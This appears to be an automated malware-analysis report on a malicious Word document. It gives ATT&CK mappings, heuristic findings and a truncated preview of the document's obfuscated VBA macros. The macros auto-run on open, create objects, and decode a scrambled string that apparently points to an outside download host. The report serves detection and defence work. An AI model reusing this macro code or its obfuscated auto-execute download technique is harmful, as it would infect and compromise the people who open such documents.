MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macro utilizes CreateObject and CallByName, indicating it's designed to run arbitrary code. While no specific URLs or payloads were extracted, the presence of these elements strongly suggests the document's purpose is to download and execute a secondary malicious payload.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15770 bytes |
SHA-256: 4f327a332d825c45652737392b569161ba1b3b5f026a144e0c3ffc29cdb67ada |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function OEMWfnTNzNAa(ByVal kEmNZLn As String, ByVal pUQDO As String) As Integer
lNWbDXPZykQjnC
xYGCrAfNU = 6891
aIazdevr 4165
yPsCNPssGyiOpN 7578, "QLjTiJyxkvHq3D3xoJ"
If NjIyodZJSVmYfi Then
qmIeR "Tc5GTfIJ7DdJykponF2TvjzdnDdkq5", True, "CR5nll4nqHu2yZ3XoSjvZjPprOKLz"
WEWJNBAlbfoeL "75yJtcASgwEAVWYHBzmb1UceE92k8L", True
DAUosIn
Else
CcVIZQDGBz 1146
End If
OEMWfnTNzNAa = 5291
End Function
Private Sub hKqOqK(ByVal IfkvY As String, ByVal isEBabzjVW As Integer)
TeWBtwRjPIlabt "EBZ4lSC8U8cOT4AXXC1KYoAir3H", 5222, True
eChsuJzQdyZ
sfYHcObVOTvE 7063
End Sub
Private Function uCazxXMenr() As String
If oOHmni Then
NwkbshfERc
Else
YMGoUeYFXwuwr 2523
End If
uCazxXMenr = "1T251UeVLs4ojGYnZX"
End Function
Private Sub Document_Open()
Dim QuVBLoFVmJ As String
rdYkMVXOybK = 5132
ZTRLmRY.IeltIyKRyTF
End Sub
Private Function HVptOfWeqFdD(ByVal ibPzahNpHBa As Integer, ByVal cVprSeCGn As String) As Boolean
ELqtEE 564, 1218, "fYhSanXTOsUyz4G11"
Wujyauj = 5855
LbiswoA 1901, "FZeNvsNzHi9n0IXHl5qfOQMlvIv"
PjwNogbxKJYdhp 7473
AIgTVkicIiowa 238, "jQ2RCZ3flRQoFBoeBw", "csxxOj5E4fAkaVs3SIm6hCznES74xLf"
HVptOfWeqFdD = False
End Function
Attribute VB_Name = "ZTRLmRY"
Private Sub HfqHLHZbDWXG()
Dim igRuTIDG As Integer
tkkycPmxl = 7110
LUmzLGgdHt zmAFY.xCgUgpbq, 1503, zuyIhzjGWMJA
zmAFY.LtQQqEcNTgunYW zmAFY.xCgUgpbq
End Sub
Public Sub IeltIyKRyTF()
OXCJNgpDtFM = 4891
On Error GoTo ymplNbbZN
NanxJOZRPgXjf.yUYnKpy
NanxJOZRPgXjf.LInuQiCINRGQ
HfqHLHZbDWXG
Exit Sub
ymplNbbZN:
End Sub
Private Sub LUmzLGgdHt(ByVal PmvDNPhbtLk As String, ByVal hbOnwg As Integer, ByVal GqfmFq As String)
Dim DVrCCocfjsOyZm As Integer
Set OSuWuqT = SUmbbGJsrQGlCr.BIQbSq("7DAiIjyApsFWR2b9rd6tCgQ9hzmH", GqfmFq, "jQy98rK5A8fEjlnT1Uad84cFxu")
SUmbbGJsrQGlCr.CkIEnCkFfLK OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
zmAFY.equhCgWhZp PmvDNPhbtLk, JwYwcNCOgCBwx.RJkrOlROSrZNDx(OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function NeTnC(ByVal NyEjjJOeppzvOE As String, ByVal sdTFLdHw As String) As Object
Dim pXNhOhhlfvQYW As String
Dim JvrVRRrIkDqj As String
Set NeTnC = tvuwZWCvZhgWlH(CreateObject(sdTFLdHw), False, False)
End Function
Private Function tvuwZWCvZhgWlH(ByVal jEvgfVKxGMtEx As Object, ByVal dNBIYwL As Boolean, ByVal LPleCMTEk As Boolean) As Object
Set tvuwZWCvZhgWlH = jEvgfVKxGMtEx
End Function
Private Function zuyIhzjGWMJA() As String
zuyIhzjGWMJA = gAdcATNCVnZS.PgkLSbQzzWryIn("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "gAdcATNCVnZS"
Public Function PgkLSbQzzWryIn(ByVal gwLgQ As String, ByVal tPCdqy As String) As String
Dim VqVNGbMrhz As Boolean
For fQwLCKC = mwYnHDX To cXfrU.zcNPzc("JKfPgfJhcKHSbEEA3HLGz9GFQINRMJRh6", gwLgQ)
PgkLSbQzzWryIn = cXfrU.QQoki("qokImbaq3kdd6keZ5NeloJVNPe", PgkLSbQzzWryIn, 8054, xurZbHiOIAcCvh(tPCdqy, cXfrU.wVpDPwrVlS(fQwLCKC, "T2uCee33zvXfolvMcgj", gwLgQ)))
Next
End Function
Private Sub kJWXGQFTW(ByVal QYURU As Boolean)
kWQntlSa = "gATjq1CKBKYu2LCuoJRy9mx"
VXJfqbSP 4633, "IvO70p0tZ3UKYSdyaDugrW"
zVAAaHy "wv0kZZuOdF1BBAGfSSqHZB", "foSqSLxBXhwpwpMiHz3R", "ETu5lDkIFxmfvJW2OEpU"
YBsWLiizT = False
jRWGpPV "9OsV7vnTWiDU1mgggGLiMXW8WWs"
OtEdnsXfbIU 7882
wYMGZVuWWXY = 779
HfkDIKvuOvNV
End Sub
Private Sub PdXPfFkfboaF()
If qlgQJwp Then
NRIoJ
NtQSYMjGdrJNEM = "ldlQ19QhOknTinh7hhONPTc3"
End If
End Sub
Private Function xurZbHiOIAcCvh(ByVal OGbCxSQtjvXeL As String, ByVal eLOWeelSAhD As String) As String
Dim rawcsCuVbm As Integer
Dim qOunYEyoWN As String
If Not cXfrU.JdYJTAZ(eLOWeelSAhD, "Ui08UAFZHvMTWDh4YUo", OGbCxSQtjvXeL, 4638) Then
xurZbHiOIAcCvh = eLOWeelSAhD
End If
End Function
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.